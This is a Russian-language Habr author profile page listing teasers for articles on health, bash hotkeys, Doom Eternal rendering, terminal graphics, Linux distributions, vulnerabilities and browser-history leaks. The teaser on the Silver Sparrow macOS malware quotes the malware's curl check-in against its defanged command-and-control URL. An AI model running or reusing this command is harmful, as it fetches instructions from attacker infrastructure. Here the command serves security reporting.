Search
Write a publication
Pull to refresh
0
Василь Бєляєв @VXPread⁠-⁠only

C#, C++, Lua

Send message

Кофе и чай удивительно полезны для здоровья

Reading time5 min
Views121K

Новое исследование пополняет чашу растущего количества фактов, указывающих на то, что кофе и чай — и, похоже, именно в больших количествах — помогают жить дольше и здоровее. В нескольких проведенных ранее исследованиях потребление кофе удалось связать со сниженным риском развития диабета 2-го типа, рака, болезни Паркинсона, депрессии и болезни Альцгеймера. Опубликованная в прошлом месяце работа связала потребление нескольких чашек кофе в день со снижением риска смерти от рака простаты на 16%. Оказалось, что люди, которые пьют чай (зеленый или черный), тоже живут дольше, и у них меньше вероятность сердечных и других смертельных заболеваний.

Читать далее

Использование быстрых клавиш в командной строке Linux (BASH)

Reading time14 min
Views105K

Эта статья посвящена наиболее часто используемым комбинациям клавиш при работе в командной строке Linux (в основном в командном интерпретаторе bash).

Она точно будет полезна начинающим своё знакомство с Linux и, уверен, пригодится тем, кто уже имеет опыт (не всегда годы практики учат работать быстрее).

Никогда не развивал навыка быстрой печати, но знание не одного десятка hotkey'ев, перечисленных в этом материале, позволяет набирать команды со скоростью мысли.

Я попытался продемонстрировать многие примеры при помощи анимированных gif'ок – иногда несколько кадров больше скажут, чем несколько абзацев текста.

Читать далее

Как найти 0day

Level of difficultyHard
Reading time8 min
Views9.6K

Решил написать о часто встречающейся ошибке в сетевых приложениях и сетевых устройствах. Постараюсь объяснить проблему, на примере Linux стека. И буду больше рассуждать Абстрактно, пытаясь объяснить принцип. Ведь все приложения разные, хоть суть одна. (Переносят биты туда-сюда.) И к каждому сетевому приложению, или к сетевому устройству нужен свой подход, чтоб исправить допущенные в нём ошибки.

Посмотрим

Как рендерится кадр DOOM Ethernal

Reading time16 min
Views31K


Вступление


Doom Eternal не нуждается в отдельном представлении: это прямой преемник Doom 2016, разработанный благодаря седьмой итерации id Tech, внутреннего движка студии id Software. В свое время меня поразило и высокое качество визуальной составляющей Doom 2016, и простота и элегантность технических решений. В этом отношении Doom Eternal превосходит своего предшественника во многих областях, и некоторые из них достойны детального разбора. В этой аналитической статье я постараюсь обсудить их все.

Мой анализ вдохновлен трудом Adrian Courrèges про Doom 2016 (перевод). Я считаю, что подобные работы позволяют взглянуть на подходы к решению некоторых проблем рендеринга AAA-проектов и тем самым становятся превосходными обучающими материалами. В этом анализе я планирую обсудить общие особенности и не погружаться слишком глубоко в тонкости каждого способа и прохода рендеринга. Кроме того, некоторые проходы в Doom Eternal почти не отличаются от своих аналогов в Doom 2016 и уже были разобраны в труде Adrian Courrèges, поэтому я могу их пропустить.

Хочу особым образом отметить строго обучающий характер текущей статьи. Я никоим образом не поддерживаю реверс-инжиниринг продуктов с целью кражи интеллектуальной собственности или иного злого умысла. Если вы еще не успели сыграть в Doom Eternal, можете не беспокоиться: я разбирал лишь самое начало игры, поэтому спойлеры вам не грозят.

Итак, приступим.
Читать дальше →

Просто вертикальный монитор не значит, что я на телефоне

Reading time3 min
Views16K

YouTube на вертикальном экране

Да, я странный человек, полностью признаю. На домашнем компьютере у меня установлен вертикальный монитор. Я составляю и читаю и много длинных документов — и такой форм-фактор меня вполне устраивает.

Я давно так делаю. Это естественная часть моего рабочего процесса. Такая ориентация экрана лучше подходит для любых документов, которые длиннее электронного письма. Большинство приложений Linux нормально работают в таком формате, хотя меню не всегда помещается на экране.

Но сайты в интернете — это что-то совершенно ненормальное! Многие думают, что вертикальный экран — это обязательно мобильное устройство!

Да, проблема мелкая и касается лично меня, но всё-таки есть смысл пояснить, какие последствия возникают, в чём причина и как её исправить.
Читать дальше →

На 30 тысячах компьютеров с macOS нашли странный зловред, который ждёт команду

Reading time4 min
Views22K


Новая вредоносная программа Silver Sparrow («Серебряный воробей»), обнаруженная почти на 30 000 компьютерах Mac по всему миру, привлекла внимание специалистов по безопасности. Причин несколько. Во-первых, зловред поставляется в двух бинарниках, в том числе для процессора М1. Во-вторых, исследователи не могут понять цель злоумышленников.

Раз в час заражённые компьютеры проверяют контрольный сервер на предмет новых команд или двоичных файлов для выполнения:

curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.json
plutil -convert xml1 -r /tmp/version.json -o /tmp/version.plist
Читать дальше →

Как умные тележки покоряют супермаркеты в США

Reading time4 min
Views20K

Магазины в Америке рассчитывают на то, что после пандемии люди больше не захотят касаться руками общих мест и общаться с кассирами. Последним таким ритейлером стал Kroger, с 2750 магазинов в стране. Он выпустил «умную» тележку, умеющую сканировать и взвешивать продукты. А еще — давать рекламу, от которой невероятно сложно устоять.

Читать далее

Цензура в интернете. Надо что-то делать

Reading time6 min
Views35K

Интернет сегодня как воздух. Его никто не замечает и принимает как должное до тех пор, пока его кто-то не испортит или не отключат вовсе (привет горячему августу 2020 в РБ). В данной статье я расскажу, какие меры можно предпринять, имея в руках только браузер. Каждый инструмент вне браузера -- это тема для отдельной публикации

PS: а ещё вангую реакцию: "О, прикольно. Добавлю в закладки. Почитаю как-нибудь потом". Ага, когда интернет пропадёт?

Читать далее

Bedrock Linux: лего-набор для создания идеального linux-дистрибутива

Reading time5 min
Views18K


С момента появления Linux достаточно скоро возникло множество дистрибутивов: Slack, RedHat, Debian, SUSE и т. д. Тогда же возникла и проблема выбора дистрибутива, ведь каждый из них имеет свои особенности и преимущества, которые делают его особенным. RedHat и Debian наиболее стабильные и консервативные из дистрибутивов, Ubuntu заточен на удобство и имеет прекрасный пользовательский интерфейс, Gentoo — свобода выбора и гибкость.

У каждого пользователя Linux были моменты, когда ему не хватало некоторых функций, реализованных в других дистрибутивах. Многим в свое время не понравилось, что Debian перешел на systemd и они создали на его основе новый дистрибутив — Devuan. Некоторые перешли на Gentoo, где пользователь может создать среду с двумя системами инициализации: как с openrc, так и с systemd.

В разных дистрибутивах этот вопрос решается по-разному. Установка пакета, который отсутствует в штатном репозитории, решается с помощью docker-контейнеров, или использованием систем самодостаточных пакетов snap и flatpak. Можно даже ставить RPM пакеты на системах с пакетным менеджером DEB. В Gentoo имеется поддержка RPM и DEB пакетов. Все это работает, однако плохо масштабируется и не очень стабильно.

Создатели Bedrock Linux пошли дальше и создали полноценный мета-дистрибутив. В нем возможно использование не только пакетов, но и компонент различных Linux дистрибутивов, как кубиков Лего. В одном окружении можно создать систему из нескольких Linux OS, например установку дополнительных пакетов Ubuntu поверх базовых компонент Debian и Arch. Установочный скрипт доступен для следующих платформ.

  • aarch64;
  • armv7hl;
  • armv7l;
  • mips64el;
  • mips64;
  • mips;
  • mipsel;
  • ppc64;
  • ppc64le;
  • ppc;
  • s390;
  • x86_64;
  • x86;
Читать дальше →

Реддит против Wall Street: как идёт борьба троллей с финансовыми воротилами

Reading time3 min
Views43K

Вы, возможно, слышали о войне Реддита против хедж-фондов Wall Street. Но на Хабре об этом вроде нет, и за последние дни случились новые потрясения. Капитализация GameStop выросла до рекордных $24 млрд. Хедж-фонд признал своё поражение, в бой вступил Илон Маск, а некоторые самые отчаянные тролли уже стали мультимиллионерами.

Читать далее

Изучаем календарь

Reading time6 min
Views38K
Эта статья получилась из вопроса, который я сам себе задал вчера.
«Существует ли год, в котором ни один месяц не начинается в понедельник?»
На первый взгляд — да. Год может начинаться с любого дня недели, месяцы тоже каждый раз начинаются в разные дни недели. Вариантов множество, скорее всего, найдётся и не один такой год.

Так я подумал в первую минуту после того, как задался вопросом. Это следовало бы доказать. Перебрать все года, например. Простой и быстрый способ, но не интересный. Доказать математически было намного более заманчивой идеей, но как к этому подступиться я совершенно не понимал. Поэтому просто начал выписывать продолжительность каждого месяца на бумагу.

Тут стоит оговорить, что речь дальше пойдёт про григорианский календарь, по которому мы живём с 1918 года. Однако часть рассуждений будет верна и для юлианского.
Так как же на самом деле?

Графика в терминале

Reading time3 min
Views33K
Эта история началась, когда я узнал о существовании bpytop. Меня поразила детализация графиков и я начал разбираться как это сделано. Оказалось, что для вывода графиков использовались символы алфавита Брайля, представляющие из себя комбинацию из 8 точек: 2 точки в ширину и 4 точки в высоту. Поискав готовые решения, использующие этот подход, я нашел на реддите анонс такого проекта. В первом же комментарии анонса я прочитал:
Это конечно круто, но почему люди просто не переоткроют для себя ReGIS (векторную графику в терминале) и sixel (пиксельную графику в терминале).
До этого момента я ничего не знал про sixel. Копнув глубже я выяснил, что в теории sixel должен поддерживаться xterm-ом. Я запустил xterm на своей ubuntu 20.04 в режиме эмуляции vt340

xterm -xrm "XTerm*decTerminalID: vt340" -xrm "XTerm*numColorRegisters: 256"

выполнил вот такую команду (convert это команда из пакета imagemagick)

clear && convert <(curl -s https://upload.wikimedia.org/wikipedia/en/7/7d/Lenna_%28test_image%29.png) sixel:-

и увидел вот это:

image
Вау, работает!
Читать дальше →

Ученые случайно обнаружили колонию странных существ подо льдом Антарктиды

Reading time3 min
Views104K

Несколько дней назад исследователи пробурили антарктический шельф для того, чтобы взять образцы отложений на дне океана. Вместо этого они нашли колонию животных, которых там не могло быть. Об их находке рассказывает Wired.

Читать далее

Как мы раскрыли 24-летний баг в ядре Linux

Reading time13 min
Views46K

Захватывающий детективный рассказ о поиске и исправлении трудноуловимого и при этом весьма странного бага, который неведомым образом ускользал от обнаружения на протяжении долгих лет взросления системы Linux. В начале описывается предыстория и технологическая база компании, в которой этот баг постигло разоблачение, после чего автор подробно демонстрирует все предпринятые для его раскрытия шаги.
Читать дальше →

Технологии противоударной защиты жестких дисков

Reading time12 min
Views17K


Поскольку жесткий диск является не просто электронным, а электромеханическим устройством, его главными врагами были и остаются сильная вибрация и удары. Но если вибрационное воздействие приводит к снижению производительности винчестера, что объясняется отклонением блока головок от заданной траектории и повторной инициализацией процедуры позиционирования, то даже достаточно сильный толчок (не говоря уже о падении) может спровоцировать полный выход накопителя из строя. Почему HDD такие нежные и на какие меры идут производители винчестеров для повышения их надежности? Попробуем разобраться.
Читать дальше →

Как избежать «парадокса убитого дедушки» или Квантовая механика решает загадки путешествия во времени

Reading time7 min
Views26K

Путешествия во времени давно стали основным жанром фильмов, романов и телевизионных шоу, которые служили всем: от заднего плана до подростковых весёлых комедий, таких как «Назад в будущее», и вдумчивого созерцания в новелле Рэя Брэдбери «И грянул гром». Часто эти истории сосредотачиваются вокруг одного аспекта путешествия во времени – возможных последствий того, что путешественник во времени поменяет прошлые события, в результате чего по возвращении в будущее произойдёт кошмарный сценарий, влияя на способность вообще путешествовать в прошлое.

Эта дилемма, известная как «парадокс убитого дедушки», отражает главное возражение философов и физиков против путешествий во времени – возможное нарушение причинности. В то время как само путешествие во времени остаётся в области чистой спекуляции, возможные результаты нарушения принципа причинности и то, как природа может предотвратить их, являются горячо обсуждаемыми темами, с  такими известными физиками и философами, как Стивен Хокинг и Кип Торн, размышляющими о возможных решениях. Возможно ли, что «многомировая» интерпретация квантовой механики может спасти несчастного (и неуклюжего) путешественника во времени?

Приятного чтения!

Улучшение производительности vue приложения

Reading time8 min
Views19K

У нас в TeamHood есть wiki. Там собралась коллекция рекомендаций, в том числе, по улучшению производительности тяжелого фронтенда на vue.js. Улучшать производительность понадобилось, потому что в силу специфики наши основные экраны не имеют пагинации. Есть клиенты, у которых на одной kanban/gantt доске больше тысячи вот таких вот карточек, все это должно работать без лагов.

В статье разобрано несколько редко упоминаемых техник из нашей wiki, которые помогут сократить излишний рендеринг компонентов и улучшить производительность.

Читать далее

Мутации SARS-CoV-2: всё плохо или можно выдохнуть?

Reading time7 min
Views28K

Как мутации могут изменить ход пандемии? Вакцины ведь против них не работают, да? Что мы можем с этим поделать? Шеф, всё пропало?

А также: что будет, если играть с вирусами в лотерею; что будет, если болеть ковидом 154 дня; и при чём здесь квантовая механика и π-электроны. Читайте и вы узнаете об этом первыми!

Читать про π-электроны и многое другое

Новая утечка истории браузера через favicon

Reading time3 min
Views8.4K

Недавно наткнулся на это исследование pdf (по его мотивам уже была статья на хабре), после прочтения, решил поискать более интересные способы использования F-Cache. Объективно, схему с редиректами никто в здравом уме не будет ставить на свой сайт. Это утечка, но утечка представляющая больше теоретический интерес, чем практический(имхо).

Обозначил цель(найти способ проверить F-Cache через javascript) и начал поиски. В ходе экспериментов выделил несколько способов это сделать, но опишу самый интересный, на мой взгляд.

Ссылка на чекер под катом.

Читать далее

Information

Rating
Does not participate
Location
Одесса, Одесская обл., Украина
Date of birth
Registered
Activity